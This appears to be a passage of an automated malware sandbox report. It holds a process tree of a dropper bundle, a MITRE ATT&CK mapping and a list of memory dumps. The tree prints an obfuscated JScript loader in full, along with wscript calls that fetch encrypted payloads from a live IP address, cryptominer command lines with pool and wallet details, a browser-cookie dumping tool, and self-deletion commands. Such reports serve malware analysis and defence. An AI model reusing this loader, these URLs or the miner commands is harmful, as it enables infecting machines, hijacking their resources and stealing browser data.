"http://45.138.24.76/?NTUzNDUx&bbeJnicAd&s2ht4=YmKrVCJqveDSk2bCIEBj38VndTjvVgfdOKa1TbgC-jgeDLgEOmMxeC15E9LeqzkWNzVafsJSC-RKJZAlH_JSRRrJo3AjxybUTdJojkRKD6mNUxOkZUVoT6QlHmPrPFKLArkh0BUZnVVnKJp1zohzGBiO6Mmh3sfSyRD92q-qT8rdwn5Qd&oa1n4=x33QcvWfaRyPDojEM_jdSqRBP0zYHliIxYq&fSDhMjI0NQ==" "2"
        9⤵
        
        PID:276
        
        C:\Windows\SysWOW64\wscript.exe
        
        wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?NTUzNDUx&bbeJnicAd&s2ht4=YmKrVCJqveDSk2bCIEBj38VndTjvVgfdOKa1TbgC-jgeDLgEOmMxeC15E9LeqzkWNzVafsJSC-RKJZAlH_JSRRrJo3AjxybUTdJojkRKD6mNUxOkZUVoT6QlHmPrPFKLArkh0BUZnVVnKJp1zohzGBiO6Mmh3sfSyRD92q-qT8rdwn5Qd&oa1n4=x33QcvWfaRyPDojEM_jdSqRBP0zYHliIxYq&fSDhMjI0NQ==" "2"
        10⤵
        
        PID:3056
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c 77efc.exe
        11⤵
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\77efc.exe
        
        77efc.exe
        12⤵
        
        PID:2168
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:972 CREDAT:275483 /prefetch:2
        8⤵
        
        PID:2384
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:972 CREDAT:930849 /prefetch:2
        8⤵
        
        PID:3308
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:972 CREDAT:1061920 /prefetch:2
        8⤵
        
        PID:2348
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?MjUxNjg0&yfRP&s2ht4=Yn6rVCJ2vfzSj2bCIFxj38V7dSTvVgfdOKa1UbgC-iQeDLgYOn8xeC15E87eqzkWNzVafsJPQ_hKJMw5E-5KWELU53F_xnbUUc8ojlhXQ6mdUzu5MUVkU6A5GmPzPFKLIrhJzXUYzVVvNfJ0jokzBUCO5NTJwsfO8RDhxq-qT8rd3n5Md&oa1n4=x33QcvWfaRuPDojDM_jdSqRGP0zYHliPxYq&ZylThNTE5Nw==" "2"
        9⤵
        
        PID:2448
        
        C:\Windows\SysWOW64\wscript.exe
        
        wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?MjUxNjg0&yfRP&s2ht4=Yn6rVCJ2vfzSj2bCIFxj38V7dSTvVgfdOKa1UbgC-iQeDLgYOn8xeC15E87eqzkWNzVafsJPQ_hKJMw5E-5KWELU53F_xnbUUc8ojlhXQ6mdUzu5MUVkU6A5GmPzPFKLIrhJzXUYzVVvNfJ0jokzBUCO5NTJwsfO8RDhxq-qT8rd3n5Md&oa1n4=x33QcvWfaRuPDojDM_jdSqRGP0zYHliPxYq&ZylThNTE5Nw==" "2"
        10⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c agv6c.exe
        11⤵
        
        PID:3776
        
        C:\Users\Admin\AppData\Local\Temp\agv6c.exe
        
        agv6c.exe
        12⤵
        
        PID:2252
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:972 CREDAT:1717278 /prefetch:2
        8⤵
        
        PID:1364
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      PID:2392
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:3588
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3628
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe"
      4⤵
      PID:3892
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        5⤵
        
        PID:3928
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        6⤵
        
        PID:2304
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
      4⤵
      PID:3940
    - - C:\Users\Admin\AppData\Roaming\D1F1.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\D1F1.tmp.exe"
        5⤵
        
        PID:2148
      - C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        6⤵
        
        PID:1160
      - C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        6⤵
        
        PID:2108
    - - C:\Users\Admin\AppData\Roaming\D481.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\D481.tmp.exe"
        5⤵
        
        PID:2564
      - C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\D481.tmp.exe
        6⤵
        
        PID:4092
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        7⤵
        Delays execution with timeout.exe
        
        PID:2320
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
        5⤵
        
        PID:2180
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:3892
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
      4⤵
      PID:3916
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
      4⤵
      PID:800
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
      4⤵
      PID:3880
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:920
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:1212
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:2024
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:2580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef6d56e00,0x7fef6d56e10,0x7fef6d56e20
  2⤵
  PID:1236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1092,11224611574189711878,5643412338670472876,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1084 /prefetch:2
  2⤵
  PID:1964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1092,11224611574189711878,5643412338670472876,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1376 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2236

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef6d56e00,0x7fef6d56e10,0x7fef6d56e20
  2⤵
  PID:840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=992,2146161880493606871,18282593633316267393,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1044 /prefetch:2
  2⤵
  PID:1728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=992,2146161880493606871,18282593633316267393,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1372 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=992,2146161880493606871,18282593633316267393,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 /prefetch:8
  2⤵
  PID:2164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=992,2146161880493606871,18282593633316267393,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2012 /prefetch:1
  2⤵
  PID:2484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=992,2146161880493606871,18282593633316267393,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2064 /prefetch:1
  2⤵
  PID:2512
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=992,2146161880493606871,18282593633316267393,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2340 /prefetch:1
  2⤵
  PID:2548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=992,2146161880493606871,18282593633316267393,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2536 /prefetch:1
  2⤵
  PID:2752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=992,2146161880493606871,18282593633316267393,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2744 /prefetch:1
  2⤵
  PID:2776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=992,2146161880493606871,18282593633316267393,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2760 /prefetch:1
  2⤵
  PID:2832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=992,2146161880493606871,18282593633316267393,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2776 /prefetch:1
  2⤵
  PID:2856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=992,2146161880493606871,18282593633316267393,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3244 /prefetch:8
  2⤵
  PID:3024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=992,2146161880493606871,18282593633316267393,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2236 /prefetch:2
  2⤵
  PID:2396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=992,2146161880493606871,18282593633316267393,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
  2⤵
  PID:1188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=992,2146161880493606871,18282593633316267393,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3332 /prefetch:8
  2⤵
  PID:2712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=992,2146161880493606871,18282593633316267393,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2612 /prefetch:8
  2⤵
  PID:2684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=992,2146161880493606871,18282593633316267393,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4028 /prefetch:8
  2⤵
  PID:2472

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:612
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2364
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2364.0.66837938\445697666" -parentBuildID 20200403170909 -prefsHandle 1132 -prefMapHandle 1124 -prefsLen 1 -prefMapSize 219537 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2364 "\\.\pipe\gecko-crash-server-pipe.2364" 1196 gpu
    3⤵
    PID:1684
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2364.3.341960320\833567195" -childID 1 -isForBrowser -prefsHandle 2068 -prefMapHandle 1008 -prefsLen 156 -prefMapSize 219537 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2364 "\\.\pipe\gecko-crash-server-pipe.2364" 1964 tab
    3⤵
    PID:2792
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2364.13.1840918158\2114956860" -childID 2 -isForBrowser -prefsHandle 2556 -prefMapHandle 2464 -prefsLen 7014 -prefMapSize 219537 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2364 "\\.\pipe\gecko-crash-server-pipe.2364" 2572 tab
    3⤵
    PID:3128
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2364.20.486587730\45323120" -childID 3 -isForBrowser -prefsHandle 2668 -prefMapHandle 2684 -prefsLen 8253 -prefMapSize 219537 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2364 "\\.\pipe\gecko-crash-server-pipe.2364" 2708 tab
    3⤵
    PID:3524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:428

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x574
1⤵
PID:684

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/428-231-0x00000000004D0000-0x0000000000537000-memory.dmp

Filesize
412KB

Download
memory/428-238-0x0000000002C40000-0x0000000002D45000-memory.dmp

Filesize
1.0MB

Download
memory/612-67-0x00000000000D0000-0x00000000000D1000-memory.dmp

Filesize
4KB

Download
memory/612-70-0x00000000000D0000-0x00000000000D1000-memory.dmp

Filesize
4KB

Download
memory/736-177-0x000007FEDD500000-0x000007FEDDE9D000-memory.dmp

Filesize
9.6MB

Download
memory/736-154-0x000007FEDD500000-0x000007FEDDE9D000-memory.dmp

Filesize
9.6MB

Download
memory/736-146-0x00000000021E0000-0x00000000021E2000-memory.dmp

Filesize
8KB

Download
memory/800-241-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/800-243-0x0000000000390000-0x0000000000391000-memory.dmp

Filesize
4KB

Download
memory/800-240-0x000007FEF3B20000-0x000007FEF450C000-memory.dmp

Filesize
9.9MB

Download
memory/800-244-0x00000000005B0000-0x00000000005D1000-memory.dmp

Filesize
132KB

Download
memory/800-245-0x000000001AE60000-0x000000001AE62000-memory.dmp

Filesize
8KB

Download
memory/800-246-0x00000000003A0000-0x00000000003A1000-memory.dmp

Filesize
4KB

Download
memory/824-48-0x000007FEF5410000-0x000007FEF5DFC000-memory.dmp

Filesize
9.9MB

Download
memory/824-142-0x000000001BD50000-0x000000001BD52000-memory.dmp

Filesize
8KB

Download
memory/824-139-0x0000000000D60000-0x0000000000D61000-memory.dmp

Filesize
4KB

Download
memory/868-195-0x0000000000980000-0x00000000009C4000-memory.dmp

Filesize
272KB

Download
memory/868-218-0x0000000000B20000-0x0000000000B87000-memory.dmp

Filesize
412KB

Download
memory/1048-34-0x00000000023C0000-0x00000000023C1000-memory.dmp

Filesize
4KB

Download
memory/1084-2-0x00000000761F1000-0x00000000761F3000-memory.dmp

Filesize
8KB

Download
memory/1160-220-0x0000000140000000-0x0000000140383000-memory.dmp

Filesize
3.5MB

Download
memory/1160-228-0x0000000140000000-0x0000000140383000-memory.dmp

Filesize
3.5MB

Download
memory/1368-167-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/1400-83-0x0000000004F10000-0x0000000004F11000-memory.dmp

Filesize
4KB

Download
memory/1620-62-0x0000000002270000-0x000000000240C000-memory.dmp

Filesize
1.6MB

Download
memory/1728-56-0x00000000777D0000-0x00000000777D1000-memory.dmp

Filesize
4KB

Download
memory/1984-74-0x000007FEF7AA0000-0x000007FEF7D1A000-memory.dmp

Filesize
2.5MB

Download
memory/2108-226-0x0000000140000000-0x000000014070A000-memory.dmp

Filesize
7.0MB

Download
memory/2108-224-0x0000000000100000-0x0000000000114000-memory.dmp

Filesize
80KB

Download
memory/2108-230-0x0000000000160000-0x0000000000180000-memory.dmp

Filesize
128KB

Download
memory/2108-229-0x0000000140000000-0x000000014070A000-memory.dmp

Filesize
7.0MB

Download
memory/2108-222-0x0000000140000000-0x000000014070A000-memory.dmp

Filesize
7.0MB

Download
memory/2148-201-0x000007FEFC121000-0x000007FEFC123000-memory.dmp

Filesize
8KB

Download
memory/2168-204-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/2168-235-0x00000000001B0000-0x00000000001EC000-memory.dmp

Filesize
240KB

Download
memory/2168-236-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/2304-213-0x0000000000280000-0x00000000002BA000-memory.dmp

Filesize
232KB

Download
memory/2304-215-0x0000000000870000-0x00000000008C6000-memory.dmp

Filesize
344KB

Download
memory/2364-188-0x000007FEF5457000-0x000007FEF5475000-memory.dmp

Filesize
120KB

Download
memory/2364-214-0x000007FEE5F30000-0x000007FEE5F3A000-memory.dmp

Filesize
40KB

Download
memory/2484-106-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2548-173-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2548-141-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2564-233-0x0000000007240000-0x000000000C6BC000-memory.dmp

Filesize
84.5MB

Download
memory/2564-234-0x0000000000400000-0x000000000587C000-memory.dmp

Filesize
84.5MB

Download
memory/2752-112-0x0000000000880000-0x00000000008800B0-memory.dmp

Filesize
176B

Download
memory/2752-99-0x0000000000880000-0x00000000008800B0-memory.dmp

Filesize
176B

Download
memory/2752-98-0x0000000000880000-0x00000000008800B0-memory.dmp

Filesize
176B

Download
memory/2832-113-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2832-105-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2856-121-0x0000000000880000-0x00000000008800B0-memory.dmp

Filesize
176B

Download
memory/2856-115-0x0000000000880000-0x00000000008800B0-memory.dmp

Filesize
176B

Download
memory/3032-162-0x0000000000401000-0x000000000040C000-memory.dmp

Filesize
44KB

Download
memory/3768-237-0x0000000000A50000-0x0000000000A52000-memory.dmp

Filesize
8KB

Download
memory/3768-208-0x000007FEDD500000-0x000007FEDDE9D000-memory.dmp

Filesize
9.6MB

Download
memory/3768-207-0x000007FEDD500000-0x000007FEDDE9D000-memory.dmp

Filesize
9.6MB

Download
memory/3916-217-0x00000000712D0000-0x0000000071473000-memory.dmp

Filesize
1.6MB

Download
memory/3928-193-0x0000000002650000-0x0000000002654000-memory.dmp

Filesize
16KB

Download
memory/3940-232-0x0000000002720000-0x0000000002768000-memory.dmp

Filesize
288KB

Download
memory/3940-186-0x0000000000020000-0x000000000002D000-memory.dmp

Filesize
52KB

Download